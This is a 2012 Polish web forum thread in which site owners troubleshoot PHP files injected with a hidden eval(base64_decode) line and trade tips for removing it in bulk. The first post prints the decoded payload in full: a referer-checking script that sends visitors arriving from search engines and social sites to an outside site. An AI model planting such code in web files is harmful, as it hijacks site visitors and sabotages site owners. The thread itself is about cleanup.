Zawirusowane ftp

[hazael]

Witam,

Przez tydzien czasu spadła mi oglądalność strony o 90% - generalnie nie wiedziałem co moglo być powodem, bo witryna działała poprawnie. W google, też dość wysoko stoi. Problem został znaleziony poprzez probe otwarcia strony bezposrednio z wyników wyświetlanych w Google. Okazalo się, że moja i pozostałe strony na serwerze zawierają w plikach php dopisany skrypt przekierowywujacy na jakaś obcą witrynę (zwykle porno).

Jakimś sposobem, większość plików php została w jednym krótkim czasie uzupełniona o ten zapis:

base64_decode("DQplcnJvcl9yZXBvcnRpbmcoMCk7DQ  (...skrócone...)  okcWF6c0KfQp9Cn0NCn0NCn0="));

Co po odkodowaniu w rezultacie daje taki skrypt:

error_reporting(0);
$qazplm=headers_sent();
if (!$qazplm){
$referer=$_SERVER['HTTP_REFERER'];
$uag=$_SERVER['HTTP_USER_AGENT'];
if ($uag) {
if (!stristr($uag,"MSIE 7.0") and !stristr($uag,"MSIE 6.0")){
if (stristr($referer,"yahoo") or
stristr($referer,"bing") or
stristr($referer,"rambler") or
stristr($referer,"gogo") or
stristr($referer,"live.com")or
stristr($referer,"aport") or
stristr($referer,"nigma") or
stristr($referer,"webalta") or
stristr($referer,"begun.ru") or
stristr($referer,"stumbleupon.com") or
stristr($referer,"bit.ly") or
stristr($referer,"tinyurl.com") or
preg_match("/yandex\.ru\/yandsearch\?(.*?)\&lr\=/",$referer) or
preg_match ("/google\.(.*?)\/url\?sa/",$referer) or
stristr($referer,"myspace.com") or
stristr($referer,"facebook.com") or
stristr($referer,"aol.com")) {
if (!stristr($referer,"cache") or !stristr($referer,"inurl")){
header("Location: https://rnd.jkub.com/");
exit();
}
}
}
}
}

Na jednej ze stron znalazlem rozwiazanie z usunięciem tego zlosliwego wpisu:

https://tech.sarathdr...nunfinished-com

Niestety zatrzymałem się w martwym punkcie. W konsoli ssh przy wybraniu komendy:

find . -name '*.php' -exec ./clean.sh \{\} \;

Pojawia mi się komunikat:

find: `./clean.sh': Permission denied

find: `./clean.sh': Permission denied

find: `./clean.sh': Permission denied

find: `./clean.sh': Permission denied

find: `./clean.sh': Permission denied

Co może być problemem i jak to rozwiazać?

Edytowane 19 Października 2012 przez hazael

[Mion]

Na twoim miejscu w konsoli SSH i MC poszukał bym w katalogu serwisu wystapień ciągu zawierającego:

eval(base64_decode

i późnej wymedytował pliki zawierające z tego wpisu.

[hazael]

Tak juz zrobilem, ale na serwerze mam ponad 20 stron i kazda zawiera setki takich zmodyfikowanych plików...

Najgorze jest to, że nie mam już kopii zapasowej z przed tego okresu... :-/

Edytowane 19 Października 2012 przez hazael

[Kapitan Bomba]

Też znalazłem taki badziew i to dzisiaj. Tyle że u mnie jest po base64_decode jest inny syf.

Więc mam pytanie jak to zdekodować?

[shaun_black]

Mieliście zapamiętane pełne dane w programie ftp?

[hazael]

No ja mam też po base64_decode

Już znalazłem rozwiązanie na liczne pliki - wystarczy wszystko skopiować na dysk w systemie windows i użyć programu

TextCrawler

Można ściągnąć go stąd: https://www.digitalvolcano.co.uk/content/textcrawler/tcdownload

W programie wskazujemy folder z plikami, wybieramy odpowiednie rozszerzenie i wpisujemy interesujacą nas fraze - obok zaznaczamy opcje clear. I smiga

[Kapitan Bomba]

Hazael ale jak zdekodowałeś ten badziew na coś czytelnego?

[hazael]

No dekodowałem by sprawdzić co to jest.

Wyżej masz zdekodowane. Weź do wyszukiwarki ktoa podalem wyżej wpisz ten cały zapis, jaki masz u siebie w pliku:

eval(base64_decode("DQplcnJvcl9yZXBvcnRpbmcoMCk7    (uciąłem, bo za długie)  DQokcWF6cGxtPWhlYNCWFnLCJNU0lCn0NCn0="));

I wciśnij tylko replace - wszystkie pliki ci naprawi

[Radeq]

@Kapitan Bomba https://www.google.pl/search?rls=pl&q=base64+decoder